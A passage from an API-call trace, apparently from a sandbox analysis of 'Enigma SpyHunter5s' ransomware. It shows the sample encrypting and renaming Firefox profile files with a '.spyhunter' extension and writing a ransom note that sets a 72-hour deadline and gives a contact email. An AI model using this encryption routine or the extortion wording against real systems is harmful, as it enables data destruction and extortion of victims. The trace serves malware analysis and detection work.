(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db.spyhunter")) returned 1 [0150.598] GetProcessHeap () returned 0x2c0000 [0150.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.599] GetProcessHeap () returned 0x2c0000 [0150.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0150.599] GetProcessHeap () returned 0x2c0000 [0150.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67ef8 | out: hHeap=0x2c0000) returned 1 [0150.599] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eed0 | out: pbBuffer=0x248eed0) returned 1 [0150.599] GetProcessHeap () returned 0x2c0000 [0150.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0150.599] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eec8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eec8*=0x30) returned 1 [0150.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.600] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned 103 [0150.600] StrStrW (lpFirst="parent.lock", lpSrch=".txt") returned 0x0 [0150.600] GetProcessHeap () returned 0x2c0000 [0150.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0150.600] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee8c*=0x0, lpOverlapped=0x0) returned 1 [0150.600] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.600] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x248ee8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee8c*=0x0, lpOverlapped=0x0) returned 1 [0150.601] GetProcessHeap () returned 0x2c0000 [0150.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0150.601] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.601] WriteFile (in: hFile=0xa0, lpBuffer=0x248eecc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee8c, lpOverlapped=0x0 | out: lpBuffer=0x248eecc*, lpNumberOfBytesWritten=0x248ee8c*=0x4, lpOverlapped=0x0) returned 1 [0150.601] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee8c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee8c*=0x30, lpOverlapped=0x0) returned 1 [0150.602] CloseHandle (hObject=0xa0) returned 1 [0150.602] GetProcessHeap () returned 0x2c0000 [0150.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.602] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock.spyhunter") returned 113 [0150.602] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock.spyhunter")) returned 1 [0150.603] GetProcessHeap () returned 0x2c0000 [0150.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.603] GetProcessHeap () returned 0x2c0000 [0150.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0150.603] GetProcessHeap () returned 0x2c0000 [0150.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67cc8 | out: hHeap=0x2c0000) returned 1 [0150.603] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\minidumps\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.604] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0150.604] WriteFile (in: hFile=0xa0, lpBuffer=0x248ee03*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ef2c, lpOverlapped=0x0 | out: lpBuffer=0x248ee03*, lpNumberOfBytesWritten=0x248ef2c*=0x127, lpOverlapped=0x0) returned 1 [0150.605] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0150.605] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ef2c*=0x2ac, lpOverlapped=0x0) returned 1 [0150.605] CloseHandle (hObject=0xa0) returned 1 [0150.605] GetProcessHeap () returned 0x2c0000 [0150.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe89e0 | out: hHeap=0x2c0000) returned 1 [0150.605] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eec8 | out: pbBuffer=0x248eec8) returned 1 [0150.606] GetProcessHeap () returned 0x2c0000 [0150.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0150.606] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eec0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eec0*=0x30) returned 1 [0150.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.618] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf") returned 105 [0150.618] StrStrW (lpFirst="mimeTypes.rdf", lpSrch=".txt") returned 0x0 [0150.618] GetProcessHeap () returned 0x2c0000 [0150.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0150.618] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee84*=0xef3, lpOverlapped=0x0) returned 1 [0150.636] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff10d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.636] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xef3, lpNumberOfBytesWritten=0x248ee84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee84*=0xef3, lpOverlapped=0x0) returned 1 [0150.636] GetProcessHeap () returned 0x2c0000 [0150.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0150.636] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.636] WriteFile (in: hFile=0xa0, lpBuffer=0x248eec4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee84, lpOverlapped=0x0 | out: lpBuffer=0x248eec4*, lpNumberOfBytesWritten=0x248ee84*=0x4, lpOverlapped=0x0) returned 1 [0150.637] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee84, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee84*=0x30, lpOverlapped=0x0) returned 1 [0150.637] CloseHandle (hObject=0xa0) returned 1 [0150.637] GetProcessHeap () returned 0x2c0000 [0150.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.637] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.spyhunter") returned 115 [0150.637] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf.spyhunter")) returned 1 [0150.638] GetProcessHeap () returned 0x2c0000 [0150.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.638] GetProcessHeap () returned 0x2c0000 [0150.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0150.638] GetProcessHeap () returned 0x2c0000 [0150.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0ab8 | out: hHeap=0x2c0000) returned 1 [0150.638] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eec8 | out: pbBuffer=0x248eec8) returned 1 [0150.638] GetProcessHeap () returned 0x2c0000 [0150.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0150.639] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eec0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eec0*=0x30) returned 1 [0150.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.640] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db") returned 99 [0150.640] StrStrW (lpFirst="key3.db", lpSrch=".txt") returned 0x0 [0150.640] GetProcessHeap () returned 0x2c0000 [0150.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0150.640] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee84*=0x2800, lpOverlapped=0x0) returned 1 [0150.664] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.664] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ee84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee84*=0x2800, lpOverlapped=0x0) returned 1 [0150.664] GetProcessHeap () returned 0x2c0000 [0150.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0150.664] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.664] WriteFile (in: hFile=0xa0, lpBuffer=0x248eec4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee84, lpOverlapped=0x0 | out: lpBuffer=0x248eec4*, lpNumberOfBytesWritten=0x248ee84*=0x4, lpOverlapped=0x0) returned 1 [0150.665] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee84, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee84*=0x30, lpOverlapped=0x0) returned 1 [0150.665] CloseHandle (hObject=0xa0) returned 1 [0150.665] GetProcessHeap () returned 0x2c0000 [0150.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0150.665] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.spyhunter") returned 109 [0150.665] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db.spyhunter")) returned 1 [0150.666] GetProcessHeap () returned 0x2c0000 [0150.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0150.666] GetProcessHeap () returned 0x2c0000 [0150.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0150.666] GetProcessHeap () returned 0x2c0000 [0150.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67868 | out: hHeap=0x2c0000) returned 1 [0150.666] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eec0 | out: pbBuffer=0x248eec0) returned 1 [0150.666] GetProcessHeap () returned 0x2c0000 [0150.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0150.666] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eeb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eeb8*=0x30) returned 1 [0150.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.667] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini") returned 106 [0150.667] StrStrW (lpFirst="extensions.ini", lpSrch=".txt") returned 0x0 [0150.667] GetProcessHeap () returned 0x2c0000 [0150.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0150.667] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee7c*=0x8d, lpOverlapped=0x0) returned 1 [0150.668] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff73, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.668] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x8d, lpNumberOfBytesWritten=0x248ee7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee7c*=0x8d, lpOverlapped=0x0) returned 1 [0150.668] GetProcessHeap () returned 0x2c0000 [0150.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0150.668] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.668] WriteFile (in: hFile=0xa0, lpBuffer=0x248eebc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee7c, lpOverlapped=0x0 | out: lpBuffer=0x248eebc*, lpNumberOfBytesWritten=0x248ee7c*=0x4, lpOverlapped=0x0) returned 1 [0150.669] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee7c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee7c*=0x30, lpOverlapped=0x0) returned 1 [0150.669] CloseHandle (hObject=0xa0) returned 1 [0150.669] GetProcessHeap () returned 0x2c0000 [0150.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0150.669] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.spyhunter") returned 116 [0150.669] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini.spyhunter")) returned 1 [0150.670] GetProcessHeap () returned 0x2c0000 [0150.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0150.670] GetProcessHeap () returned 0x2c0000 [0150.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0150.670] GetProcessHeap () returned 0x2c0000 [0150.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0868 | out: hHeap=0x2c0000) returned 1 [0150.670] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eec0 | out: pbBuffer=0x248eec0) returned 1 [0150.670] GetProcessHeap () returned 0x2c0000 [0150.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0150.670] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eeb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eeb8*=0x30) returned 1 [0150.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.818] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite") returned 108 [0150.818] StrStrW (lpFirst="downloads.sqlite", lpSrch=".txt") returned 0x0 [0150.818] GetProcessHeap () returned 0x2c0000 [0150.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0150.818] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248ee7c*=0x2800, lpOverlapped=0x0) returned 1 [0150.847] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.847] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ee7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248ee7c*=0x2800, lpOverlapped=0x0) returned 1 [0150.847] GetProcessHeap () returned 0x2c0000 [0150.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0150.847] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.847] WriteFile (in: hFile=0xa0, lpBuffer=0x248eebc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee7c, lpOverlapped=0x0 | out: lpBuffer=0x248eebc*, lpNumberOfBytesWritten=0x248ee7c*=0x4, lpOverlapped=0x0) returned 1 [0150.848] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee7c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee7c*=0x30, lpOverlapped=0x0) returned 1 [0150.848] CloseHandle (hObject=0xa0) returned 1 [0150.876] GetProcessHeap () returned 0x2c0000 [0150.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.876] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.spyhunter") returned 118 [0150.876] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite.spyhunter")) returned 1 [0150.877] GetProcessHeap () returned 0x2c0000 [0150.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.877] GetProcessHeap () returned 0x2c0000 [0150.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0150.877] GetProcessHeap () returned 0x2c0000 [0150.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc04f0 